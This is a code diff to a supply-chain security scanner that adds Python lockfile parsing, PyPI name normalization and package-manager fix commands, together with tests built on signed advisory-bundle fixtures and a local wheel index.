+    manifest_versions = _manifest_dependency_versions(workspace_dir, artifact, targets)
+    for target_key, version in manifest_versions.items():
+        versions.setdefault(target_key, version)
+    return versions
+
+
+def _manifest_direct_dependency_names(
+    workspace_dir: Path | None,
+    artifact: GuardArtifact,
+    *,
+    ecosystem: str,
+) -> set[str]:
+    if workspace_dir is None:
+        return set()
+    manifest_paths = artifact.metadata.get("manifest_paths")
+    if not isinstance(manifest_paths, list):
+        return set()
+    direct_names: set[str] = set()
+    for relative_path in manifest_paths:
+        manifest_path = workspace_dir / str(relative_path)
+        if not manifest_path.exists():
+            continue
+        try:
+            manifest_text = manifest_path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            continue
+        dependency_map = parse_manifest_dependencies(path=str(manifest_path.name), text=manifest_text)
+        for package_name in dependency_map:
+            direct_names.add(_normalize_package_name(ecosystem, package_name))
+    return direct_names
+
+
+def _manifest_dependency_versions(
+    workspace_dir: Path | None,
+    artifact: GuardArtifact,
+    targets: tuple[dict[str, object], ...],
+) -> dict[tuple[str, str | None], str]:
+    if workspace_dir is None:
+        return {}
+    manifest_paths = artifact.metadata.get("manifest_paths")
+    if not isinstance(manifest_paths, list):
+        return {}
+    python_targets = {target_key: target for target in targets if (target_key := _lockfile_target_key(target))}
+    versions: dict[tuple[str, str | None], str] = {}
+    for relative_path in manifest_paths:
+        manifest_path = workspace_dir / str(relative_path)
+        if not manifest_path.exists():
+            continue
+        try:
+            manifest_text = manifest_path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            continue
+        dependency_map = parse_manifest_dependencies(path=str(manifest_path.name), text=manifest_text)
+        if not dependency_map:
+            continue
+        normalized_dependencies = {
+            _normalize_package_name("pypi", package_name): specifier
+            for package_name, specifier in dependency_map.items()
+        }
+        for target_key, target in python_targets.items():
+            if (_optional_string(target.get("ecosystem")) or "npm") != "pypi" or target_key in versions:
+                continue
+            specifier = normalized_dependencies.get(str(target["normalized_name"]))
+            exact_version = _python_lockfile_version(specifier)
+            if exact_version is not None:
+                versions[target_key] = exact_version
     return versions
 
 
@@ -1632,6 +1820,92 @@ def _bun_lock_target_versions(
     return versions
 
 
+def _poetry_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+    direct_manifest_names: set[str],
+) -> dict[tuple[str, str | None], str]:
+    return _target_versions_from_direct_map(targets, _poetry_lock_direct_versions(text, direct_manifest_names))
+
+
+def _poetry_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict[str, str]:
+    try:
+        payload = tomllib.loads(text or "")
+    except tomllib.TOMLDecodeError:
+        return {}
+    packages = payload.get("package")
+    direct_versions: dict[str, str] = {}
+    if not isinstance(packages, list):
+        return direct_versions
+    for package in packages:
+        if not isinstance(package, dict):
+            continue
+        name = _optional_string(package.get("name"))
+        version = _optional_string(package.get("version"))
+        normalized_name = _normalize_package_name("pypi", name) if name is not None else None
+        if normalized_name is None or version is None or normalized_name not in direct_manifest_names:
+            continue
+        direct_versions[normalized_name] = version
+    return direct_versions
+
+
+def _uv_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+    direct_manifest_names: set[str],
+) -> dict[tuple[str, str | None], str]:
+    return _target_versions_from_direct_map(targets, _uv_lock_direct_versions(text, direct_manifest_names))
+
+
+def _uv_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict[str, str]:
+    try:
+        payload = tomllib.loads(text or "")
+    except tomllib.TOMLDecodeError:
+        return {}
+    packages = payload.get("package")
+    direct_versions: dict[str, str] = {}
+    if not isinstance(packages, list):
+        return direct_versions
+    for package in packages:
+        if not isinstance(package, dict):
+            continue
+        name = _optional_string(package.get("name"))
+        version = _optional_string(package.get("version"))
+        normalized_name = _normalize_package_name("pypi", name) if name is not None else None
+        if normalized_name is None or version is None or normalized_name not in direct_manifest_names:
+            continue
+        direct_versions[normalized_name] = version
+    return direct_versions
+
+
+def _pipfile_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+    direct_manifest_names: set[str],
+) -> dict[tuple[str, str | None], str]:
+    return _target_versions_from_direct_map(targets, _pipfile_lock_direct_versions(text, direct_manifest_names))
+
+
+def _pipfile_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict[str, str]:
+    try:
+        payload = json.loads(text or "{}")
+    except json.JSONDecodeError:
+        return {}
+    direct_versions: dict[str, str] = {}
+    for section in ("default", "develop"):
+        values = payload.get(section)
+        if not isinstance(values, dict):
+            continue
+        for package_name, package_value in values.items():
+            if not isinstance(package_name, str) or not isinstance(package_value, dict):
+                continue
+            exact_version = _python_lockfile_version(package_value.get("version"))
+            normalized_name = _normalize_package_name("pypi", package_name)
+            if exact_version is not None and normalized_name in direct_manifest_names:
+                direct_versions[normalized_name] = exact_version
+    return direct_versions
+
+
 def _target_versions_from_direct_map(
     targets: tuple[dict[str, object], ...],
     direct_versions: dict[str, str],
@@ -1639,7 +1913,7 @@ def _target_versions_from_direct_map(
     versions: dict[tuple[str, str | None], str] = {}
     for target in targets:
         target_key = _lockfile_target_key(target)
-        for candidate in _package_lock_candidate_names(target):
+        for candidate in _target_candidate_names(target):
             version = direct_versions.get(candidate)
             if version is not None:
                 versions[target_key] = version
@@ -1687,7 +1961,7 @@ def _resolved_target_version(
     if requested_range is None:
         return None
     ecosystem = _optional_string(target.get("ecosystem")) or "npm"
-    if ecosystem == "npm":
+    if ecosystem in {"npm", "pypi"}:
         lockfile_version = lockfile_versions.get(_lockfile_target_key(target))
         if lockfile_version is not None:
             return lockfile_version
@@ -1700,14 +1974,18 @@ def _bundle_package_versions(bundle_response: SupplyChainBundleResponse, target:
 
 
 def _bundle_package_name_matches(package: SupplyChainBundlePackage, target: dict[str, object]) -> bool:
-    full_name = f"{package.namespace}/{package.name}".lower() if package.namespace is not None else package.name.lower()
+    full_name = (
+        _normalize_package_name(package.ecosystem, f"{package.namespace}/{package.name}")
+        if package.namespace is not None
+        else _normalize_package_name(package.ecosystem, package.name)
+    )
     target_name = str(target["normalized_name"])
     target_namespace = _optional_string(target.get("namespace"))
     if target_namespace is not None:
         return target_name == full_name
     if package.namespace is not None:
         return False
-    return target_name == package.name.lower()
+    return target_name == _normalize_package_name(package.ecosystem, package.name)
 
 
 def _recommended_fix_allow_package_result(
@@ -1861,10 +2139,15 @@ def _bundle_package(
     package_name: str,
     package_version: str,
 ) -> SupplyChainBundlePackage | None:
-    normalized = package_name.lower()
+    normalized = _normalize_package_name("pypi", package_name)
     for item in bundle_response.bundle.packages:
-        full_name = f"{item.namespace}/{item.name}".lower() if item.namespace is not None else item.name.lower()
-        if normalized not in {item.name.lower(), full_name}:
+        full_name = (
+            _normalize_package_name(item.ecosystem, f"{item.namespace}/{item.name}")
+            if item.namespace is not None
+            else _normalize_package_name(item.ecosystem, item.name)
+        )
+        normalized_item_name = _normalize_package_name(item.ecosystem, item.name)
+        if normalized not in {normalized_item_name, full_name}:
             continue
         if item.version == package_version:
             return item
@@ -1965,6 +2248,12 @@ def _fix_command(package: dict[str, object]) -> str | None:
     if not fix_version:
         return None
     if ecosystem == "pypi":
+        if package_manager == "uv":
+            return f"uv add {package_name}=={fix_version}"
+        if package_manager == "poetry":
+            return f"poetry add {package_name}@{fix_version}"
+        if package_manager == "pipenv":
+            return f"pipenv install {package_name}=={fix_version}"
         return f"pip install {package_name}=={fix_version}"
     if package_manager == "pnpm":
         return f"pnpm add {package_name}@{fix_version}"
@@ -1991,6 +2280,48 @@ def _package_display_name(package: dict[str, object]) -> str:
     namespace = _optional_string(package.get("namespace"))
     name = _optional_string(package.get("name")) or "package"
     return f"{namespace}/{name}" if namespace is not None else name
+
+
+def _normalize_package_name(ecosystem: str, package_name: str) -> str:
+    normalized = package_name.strip().lower()
+    if ecosystem == "pypi":
+        return re.sub(r"[-_.]+", "-", normalized)
+    return normalized
+
+
+def _target_candidate_names(target: dict[str, object]) -> tuple[str, ...]:
+    alias = _optional_string(target.get("alias"))
+    namespace = _optional_string(target.get("namespace"))
+    ecosystem = _optional_string(target.get("ecosystem")) or "npm"
+    name = str(target["name"])
+    candidates: list[str] = []
+    if alias is not None:
+        candidates.append(alias)
+    qualified_name = f"{namespace}/{name}" if namespace is not None else name
+    candidates.append(qualified_name)
+    normalized_name = _normalize_package_name(ecosystem, qualified_name)
+    if normalized_name not in candidates:
+        candidates.append(normalized_name)
+    raw_package_name = _optional_string(target.get("package_name"))
+    if raw_package_name is not None and raw_package_name not in candidates:
+        candidates.append(raw_package_name)
+        raw_normalized = _normalize_package_name(ecosystem, raw_package_name)
+        if raw_normalized not in candidates:
+            candidates.append(raw_normalized)
+    return tuple(candidates)
+
+
+def _python_lockfile_version(value: object) -> str | None:
+    if not isinstance(value, str):
+        return None
+    normalized = value.strip().strip('"').strip("'")
+    if normalized.startswith(("==", "===")):
+        normalized = normalized.lstrip("=")
+    try:
+        Version(normalized)
+    except InvalidVersion:
+        return None
+    return normalized
 
 
 def _reason_severity(package: dict[str, object]) -> str:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1325,7 +1325,11 @@ def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -
             workspace_dir / "setup.py"
         ).exists()
         return workspace_dir if editable and workspace_has_python_project else None
-    candidate_path = Path(raw_spec.partition("file:")[2] if raw_spec.startswith("file:") else raw_spec)
+    path_text = raw_spec.partition("file:")[2] if raw_spec.startswith("file:") else raw_spec
+    try:
+        candidate_path = Path(path_text).expanduser()
+    except RuntimeError:
+        candidate_path = Path(path_text)
     disk_path = candidate_path if candidate_path.is_absolute() else workspace_dir / candidate_path
     if disk_path.is_dir():
         if (disk_path / "pyproject.toml").exists() or (disk_path / "setup.py").exists():

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -809,6 +809,7 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
         return ()
     parsed: list[dict[str, object]] = []
     package_manager = str(artifact.metadata.get("package_manager") or "npm")
+    redacted_command = _optional_string(artifact.metadata.get("redacted_command"))
     for item in raw_targets:
         if not isinstance(item, dict):
             continue
@@ -841,6 +842,7 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
                 "extras": tuple(item.get("extras")) if isinstance(item.get("extras"), list) else (),
                 "editable": bool(item.get("editable")),
                 "package_manager": package_manager,
+                "redacted_command": redacted_command,
             }
         )
     return tuple(parsed)
@@ -1050,6 +1052,7 @@ def _bundle_package_result(
         "riskScore": package.risk_score,
         "dependencyPath": None,
         "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "redactedCommand": _optional_string(target.get("redacted_command")),
         "alias": _optional_string(target.get("alias")),
         "reasons": (
             {
@@ -1075,6 +1078,7 @@ def _policy_package_result(target: dict[str, object], *, decision: str, rule_id:
         "riskScore": None,
         "dependencyPath": None,
         "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "redactedCommand": _optional_string(target.get("redacted_command")),
         "alias": _optional_string(target.get("alias")),
         "ruleId": rule_id,
         "reasons": (
@@ -1115,6 +1119,7 @@ def _unknown_package_result(target: dict[str, object]) -> dict[str, object]:
         "riskScore": None,
         "dependencyPath": None,
         "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "redactedCommand": _optional_string(target.get("redacted_command")),
         "alias": _optional_string(target.get("alias")),
         "reasons": (
             {
@@ -1411,6 +1416,7 @@ def _dependency_confusion_policy_package_result(
             "riskScore": None,
             "dependencyPath": None,
             "packageManager": _optional_string(target.get("package_manager")) or "npm",
+            "redactedCommand": _optional_string(target.get("redacted_command")),
             "alias": _optional_string(target.get("alias")),
             "ruleId": rule.rule_id,
             "reasons": (
@@ -1458,6 +1464,7 @@ def _heuristic_package_result(
         "riskScore": None,
         "dependencyPath": None,
         "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "redactedCommand": _optional_string(target.get("redacted_command")),
         "alias": _optional_string(target.get("alias")),
         "reasons": (
             {
@@ -2049,6 +2056,7 @@ def _recommended_fix_allow_package_result(
             "riskScore": None,
             "dependencyPath": None,
             "packageManager": _optional_string(target.get("package_manager")) or "npm",
+            "redactedCommand": _optional_string(target.get("redacted_command")),
             "alias": _optional_string(target.get("alias")),
             "reasons": (
                 {
@@ -2290,6 +2298,8 @@ def _fix_command(package: dict[str, object]) -> str | None:
         return None
     if ecosystem == "pypi":
         if package_manager == "uv":
+            if _uses_uv_pip_install(package):
+                return f"uv pip install {package_name}=={fix_version}"
             return f"uv add {package_name}=={fix_version}"
         if package_manager == "poetry":
             return f"poetry add {package_name}@{fix_version}"
@@ -2303,6 +2313,11 @@ def _fix_command(package: dict[str, object]) -> str | None:
     if package_manager == "bun":
         return f"bun add {package_name}@{fix_version}"
     return f"npm install {package_name}@{fix_version}"
+
+
+def _uses_uv_pip_install(package: dict[str, object]) -> bool:
+    command = (_optional_string(package.get("redactedCommand")) or "").split()
+    return len(command) >= 3 and tuple(command[:3]) == ("uv", "pip", "install")
 
 
 def _package_install_target(package: dict[str, object]) -> str:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -579,6 +579,7 @@ def _evaluate_with_bundle(
                 bundle_response,
                 package_name=str(target["normalized_name"]),
                 package_version=resolved_version,
+                ecosystem=_optional_string(target.get("ecosystem")) or "npm",
             )
             if resolved_version is not None
             else None
@@ -2138,9 +2139,10 @@ def _bundle_package(
     *,
     package_name: str,
     package_version: str,
+    ecosystem: str | None = None,
 ) -> SupplyChainBundlePackage | None:
-    normalized = _normalize_package_name("pypi", package_name)
     for item in bundle_response.bundle.packages:
+        normalized = _normalize_package_name(ecosystem or item.ecosystem, package_name)
         full_name = (
             _normalize_package_name(item.ecosystem, f"{item.namespace}/{item.name}")
             if item.namespace is not None

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -26,6 +26,7 @@ from ..models import GuardArtifact
 from ..store import GuardStore
 from ..store_evidence import EvidenceRecord
 from .js_semver import version_matches_js_selector
+from .package_intent_common import split_python_extras
 from .package_manifest_diff import (
     _DeadlineExceededError,
     _dependency_map_for_path,
@@ -1333,7 +1334,7 @@ def _local_python_build_result(target: dict[str, object], workspace_dir: Path | 
 
 
 def _looks_like_explicit_local_python_path(raw_spec: str) -> bool:
-    normalized = raw_spec.strip()
+    normalized, _extras = split_python_extras(_local_python_path_text(raw_spec))
     return (
         normalized == "."
         or normalized == "~"
@@ -1342,6 +1343,12 @@ def _looks_like_explicit_local_python_path(raw_spec: str) -> bool:
         or "\\" in normalized
         or bool(re.match(r"^[A-Za-z]:[\\\\/]", normalized))
     )
+
+
+def _local_python_path_text(raw_spec: str) -> str:
+    path_text = raw_spec.partition("file:")[2] if raw_spec.startswith("file:") else raw_spec
+    normalized_path, _extras = split_python_extras(path_text)
+    return normalized_path or path_text
 
 
 def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -> Path | None:
@@ -1359,7 +1366,7 @@ def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -
             workspace_dir / "setup.py"
         ).exists()
         return workspace_dir if editable and workspace_has_python_project else None
-    path_text = raw_spec.partition("file:")[2] if raw_spec.startswith("file:") else raw_spec
+    path_text = _local_python_path_text(raw_spec)
     try:
         candidate_path = Path(path_text).expanduser()
     except RuntimeError:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1561,6 +1561,7 @@ def _manifest_direct_dependency_names(
     manifest_paths = artifact.metadata.get("manifest_paths")
     if not isinstance(manifest_paths, list):
         return set()
+    package_manager = str(artifact.metadata.get("package_manager") or "npm")
     direct_names: set[str] = set()
     for relative_path in manifest_paths:
         manifest_path = workspace_dir / str(relative_path)
@@ -1570,7 +1571,11 @@ def _manifest_direct_dependency_names(
             manifest_text = manifest_path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
             continue
-        dependency_map = parse_manifest_dependencies(path=str(manifest_path.name), text=manifest_text)
+        dependency_map = _artifact_manifest_dependency_map(
+            package_manager=package_manager,
+            relative_path=str(relative_path),
+            manifest_text=manifest_text,
+        )
         for package_name in dependency_map:
             direct_names.add(_normalize_package_name(ecosystem, package_name))
     return direct_names
@@ -1586,6 +1591,7 @@ def _manifest_dependency_versions(
     manifest_paths = artifact.metadata.get("manifest_paths")
     if not isinstance(manifest_paths, list):
         return {}
+    package_manager = str(artifact.metadata.get("package_manager") or "npm")
     python_targets = {target_key: target for target in targets if (target_key := _lockfile_target_key(target))}
     versions: dict[tuple[str, str | None], str] = {}
     for relative_path in manifest_paths:
@@ -1596,7 +1602,11 @@ def _manifest_dependency_versions(
             manifest_text = manifest_path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
             continue
-        dependency_map = parse_manifest_dependencies(path=str(manifest_path.name), text=manifest_text)
+        dependency_map = _artifact_manifest_dependency_map(
+            package_manager=package_manager,
+            relative_path=str(relative_path),
+            manifest_text=manifest_text,
+        )
         if not dependency_map:
             continue
         normalized_dependencies = {
@@ -1611,6 +1621,18 @@ def _manifest_dependency_versions(
             if exact_version is not None:
                 versions[target_key] = exact_version
     return versions
+
+
+def _artifact_manifest_dependency_map(
+    *,
+    package_manager: str,
+    relative_path: str,
+    manifest_text: str,
+) -> dict[str, str]:
+    dependency_map = parse_manifest_dependencies(path=relative_path, text=manifest_text)
+    if dependency_map or package_manager != "pip":
+        return dependency_map
+    return parse_manifest_dependencies(path="requirements.txt", text=manifest_text)
 
 
 def _package_lock_target_versions(

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1033,6 +1033,8 @@ def _transitive_lockfile_results(
                     "recommendedFixVersion": package_match.recommended_fix_version,
                     "riskScore": package_match.risk_score,
                     "dependencyPath": dependency_path,
+                    "packageManager": str(artifact.metadata.get("package_manager") or "npm"),
+                    "redactedCommand": _optional_string(artifact.metadata.get("redacted_command")),
                     "reasons": (
                         {
                             "code": "transitive_lockfile_match",

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -949,14 +949,23 @@ def _transitive_lockfile_results(
     if not isinstance(lockfile_paths, list):
         return []
     results: list[dict[str, object]] = []
-    direct_target_names: set[str] = set()
+    direct_target_names_by_ecosystem: dict[str, set[str]] = {}
+    all_direct_target_names: set[str] = set()
     for target in _targets_from_artifact(artifact):
-        direct_target_names.add(str(target["normalized_name"]))
-        direct_target_names.update(_target_candidate_names(target))
+        ecosystem = _optional_string(target.get("ecosystem")) or "npm"
+        candidate_names = {str(target["normalized_name"]), *_target_candidate_names(target)}
+        direct_target_names_by_ecosystem.setdefault(ecosystem, set()).update(candidate_names)
+        all_direct_target_names.update(candidate_names)
     for relative_path in lockfile_paths:
         lockfile_path = workspace_dir / str(relative_path)
         if not lockfile_path.exists():
             continue
+        lockfile_ecosystem = _lockfile_ecosystem(lockfile_path.name)
+        direct_target_names = (
+            direct_target_names_by_ecosystem.get(lockfile_ecosystem, all_direct_target_names)
+            if lockfile_ecosystem is not None
+            else all_direct_target_names
+        )
         try:
             lockfile_text = lockfile_path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
@@ -997,11 +1006,19 @@ def _transitive_lockfile_results(
             if direct:
                 continue
             offline = evaluate_cached_supply_chain_bundle(
-                bundle_response, package_name=package_name, package_version=version
+                bundle_response,
+                package_name=package_name,
+                package_version=version,
+                ecosystem=lockfile_ecosystem,
             )
             if _normalize_bundle_action(offline.action) not in {"ask", "block", "warn"}:
                 continue
-            package_match = _bundle_package(bundle_response, package_name=package_name, package_version=version)
+            package_match = _bundle_package(
+                bundle_response,
+                package_name=package_name,
+                package_version=version,
+                ecosystem=lockfile_ecosystem,
+            )
             if package_match is None:
                 continue
             results.append(
@@ -1028,6 +1045,15 @@ def _transitive_lockfile_results(
                 }
             )
     return results
+
+
+def _lockfile_ecosystem(lockfile_name: str) -> str | None:
+    lower_name = lockfile_name.lower()
+    if lower_name in {"package-lock.json", "pnpm-lock.yaml", "yarn.lock", "bun.lock", "bun.lockb"}:
+        return "npm"
+    if lower_name in {"poetry.lock", "uv.lock", "pipfile.lock"}:
+        return "pypi"
+    return None
 
 
 def _bundle_package_result(

--- a/tests/guard_python_phase12_support.py
+++ b/tests/guard_python_phase12_support.py
@@ -1,0 +1,141 @@
+"""Shared Phase 12 Python supply-chain test helpers."""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import json
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+from cryptography.hazmat.primitives import hashes, serialization
+from cryptography.hazmat.primitives.asymmetric import padding
+from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey, generate_private_key
+
+from codex_plugin_scanner.guard.runtime.package_intent import (
+    build_package_request_artifact,
+    parse_package_intent,
+)
+
+WORKSPACE_ID = "workspace-alpha"
+
+
+def write_text(path: Path, text: str) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(text, encoding="utf-8")
+
+
+def package_fixture(
+    *,
+    name: str,
+    version: str,
+    default_action: str,
+    recommended_fix_version: str | None,
+    related_advisory_ids: list[str] | None = None,
+) -> dict[str, object]:
+    return {
+        "confidence": 990,
+        "defaultAction": default_action,
+        "ecosystem": "pypi",
+        "exploitLevel": "active",
+        "knownExploited": True,
+        "malwareState": "known",
+        "name": name,
+        "namespace": None,
+        "normalizedSeverity": "critical",
+        "packageAgeState": "watch",
+        "purl": f"pkg:pypi/{name}@{version}",
+        "reachability": "reachable",
+        "recommendedFixVersion": recommended_fix_version,
+        "relatedAdvisoryIds": related_advisory_ids or ["PYSEC-2026-1"],
+        "riskScore": 980,
+        "sourceIntegrityState": "high-risk",
+        "version": version,
+    }
+
+
+def bundle_response_fixture(*, packages: list[dict[str, object]]) -> dict[str, object]:
+    generated_at = datetime(2026, 5, 19, tzinfo=timezone.utc)
+    expires_at = generated_at + timedelta(hours=12)
+    bundle = {
+        "advisories": [
+            {
+                "advisoryId": "PYSEC-2026-1",
+                "aliases": ["GHSA-python-demo-1"],
+                "confidence": 990,
+                "exploitLevel": "active",
+                "knownExploited": True,
+                "malwareState": "known",
+                "normalizedSeverity": "critical",
+                "recommendedFixVersion": "0.0.0",
+                "sourceKey": "pysec",
+                "summary": "Python package vulnerability",
+                "title": "Python package vulnerability",
+            }
+        ],
+        "bundleVersion": "1747612800000-deadbeef",
+        "expiresAt": iso_fixture(expires_at),
+        "feedSnapshotHash": "feed-snapshot-1",
+        "generatedAt": iso_fixture(generated_at),
+        "keyId": "guard-bundle-key-2026-05",
+        "packages": packages,
+        "policyHash": "policy-hash-1",
+        "policyRules": [],
+        "scoringVersion": "scf-v1",
+        "sourceHashes": [{"payloadHash": "feed-hash", "sourceKey": "pysec", "staleStatus": "fresh"}],
+        "tier": "premium",
+        "workspaceId": WORKSPACE_ID,
+    }
+    private_key_pem, public_key_pem = generate_key_pair_fixture()
+    loaded_key = serialization.load_pem_private_key(private_key_pem, password=None)
+    assert isinstance(loaded_key, RSAPrivateKey)
+    canonical_payload = json.dumps(bundle, sort_keys=True, separators=(",", ":")).encode("utf-8")
+    payload_hash = hashlib.sha256(canonical_payload).hexdigest()
+    signature = loaded_key.sign(
+        canonical_payload,
+        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
+        hashes.SHA256(),
+    )
+    return {
+        "bundle": bundle,
+        "payloadHash": payload_hash,
+        "signature": base64.b64encode(signature).decode("utf-8"),
+        "signatureAlgorithm": "rsa-pss-sha256",
+        "verificationKeys": [
+            {
+                "fingerprintSha256": fingerprint_fixture(public_key_pem),
+                "keyId": "guard-bundle-key-2026-05",
+                "publicKeyPem": public_key_pem.decode("utf-8").strip(),
+                "state": "active",
+                "validUntil": None,
+            }
+        ],
+    }
+
+
+def artifact_from_command_fixture(command: str, *, workspace: Path) -> object:
+    intent = parse_package_intent(command, workspace=workspace)
+    assert intent is not None
+    return build_package_request_artifact("codex", intent, config_path="codex.json", source_scope="project")
+
+
+def iso_fixture(value: datetime) -> str:
+    return value.astimezone(timezone.utc).isoformat().replace("+00:00", "Z")
+
+
+def generate_key_pair_fixture() -> tuple[bytes, bytes]:
+    private_key = generate_private_key(public_exponent=65537, key_size=2048)
+    private_pem = private_key.private_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PrivateFormat.PKCS8,
+        encryption_algorithm=serialization.NoEncryption(),
+    )
+    public_pem = private_key.public_key().public_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PublicFormat.SubjectPublicKeyInfo,
+    )
+    return private_pem, public_pem
+
+
+def fingerprint_fixture(public_key_pem: bytes) -> str:
+    return hashlib.sha256(public_key_pem.decode("utf-8").strip().encode("utf-8")).hexdigest()

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -396,6 +396,77 @@ def test_evaluate_package_request_artifact_npm_audit_fix_scans_existing_lockfile
     assert result.packages[0]["dependencyPath"] in {"minimist", "node_modules/minimist"}
 
 
+def test_evaluate_package_request_artifact_matches_transitive_js_lockfile_names_without_pypi_normalization(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(
+        workspace_dir / "package.json",
+        """
+{
+  "name": "demo",
+  "dependencies": {
+    "express": "^4.18.2"
+  }
+}
+""".strip()
+        + "\n",
+    )
+    _write_text(
+        workspace_dir / "package-lock.json",
+        """
+{
+  "name": "demo",
+  "lockfileVersion": 3,
+  "packages": {
+    "": {
+      "dependencies": {
+        "express": "^4.18.2"
+      }
+    },
+    "node_modules/express": {
+      "name": "express",
+      "version": "4.18.2",
+      "dependencies": {
+        "left_pad": "1.3.0"
+      }
+    },
+    "node_modules/left_pad": {
+      "name": "left_pad",
+      "version": "1.3.0"
+    }
+  }
+}
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[
+                _package(
+                    name="left_pad",
+                    version="1.3.0",
+                    default_action="block",
+                    recommended_fix_version="1.3.1",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install express@4.18.2", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert any(package["name"] == "left_pad" for package in result.packages)
+
+
 def test_evaluate_package_request_artifact_blocks_local_package_with_install_scripts(tmp_path: Path) -> None:
     home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"

--- a/tests/test_guard_python_lab_phase12.py
+++ b/tests/test_guard_python_lab_phase12.py
@@ -1,0 +1,170 @@
+"""Phase 12 Python simple-index lab proof."""
+
+from __future__ import annotations
+
+import base64
+import functools
+import hashlib
+import subprocess
+import sys
+import threading
+import zipfile
+from collections.abc import Iterator
+from contextlib import contextmanager
+from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
+from pathlib import Path
+
+import pytest
+
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+
+from .guard_python_phase12_support import (
+    WORKSPACE_ID,
+    artifact_from_command_fixture,
+    bundle_response_fixture,
+    package_fixture,
+    write_text,
+)
+
+
+def _build_wheel(build_root: Path, version: str, dist_dir: Path) -> Path:
+    del build_root
+    dist_dir.mkdir(parents=True, exist_ok=True)
+    wheel_path = dist_dir / f"labdemo-{version}-py3-none-any.whl"
+    dist_info_dir = f"labdemo-{version}.dist-info"
+    package_files = {
+        "labdemo/__init__.py": f'__version__ = "{version}"\n'.encode(),
+        f"{dist_info_dir}/WHEEL": (
+            b"Wheel-Version: 1.0\n"
+            b"Generator: hol-guard-test\n"
+            b"Root-Is-Purelib: true\n"
+            b"Tag: py3-none-any\n"
+        ),
+        f"{dist_info_dir}/METADATA": (
+            "Metadata-Version: 2.1\n"
+            "Name: labdemo\n"
+            f"Version: {version}\n"
+            "Summary: HOL Guard local lab package\n"
+        ).encode(),
+    }
+    record_lines: list[str] = []
+    with zipfile.ZipFile(wheel_path, "w", compression=zipfile.ZIP_DEFLATED) as wheel_zip:
+        for relative_path, content in package_files.items():
+            wheel_zip.writestr(relative_path, content)
+            digest = base64.urlsafe_b64encode(hashlib.sha256(content).digest()).decode("ascii").rstrip("=")
+            record_lines.append(f"{relative_path},sha256={digest},{len(content)}")
+        record_lines.append(f"{dist_info_dir}/RECORD,,")
+        wheel_zip.writestr(f"{dist_info_dir}/RECORD", "\n".join(record_lines) + "\n")
+    return wheel_path
+
+
+def _write_simple_index(index_root: Path, wheel_paths: list[Path]) -> None:
+    package_links = "\n".join(
+        f'<a href="../../packages/{wheel_path.name}">{wheel_path.name}</a><br/>'
+        for wheel_path in sorted(wheel_paths)
+    )
+    write_text(index_root / "simple" / "index.html", '<a href="labdemo/">labdemo</a>\n')
+    write_text(index_root / "simple" / "labdemo" / "index.html", package_links + "\n")
+
+
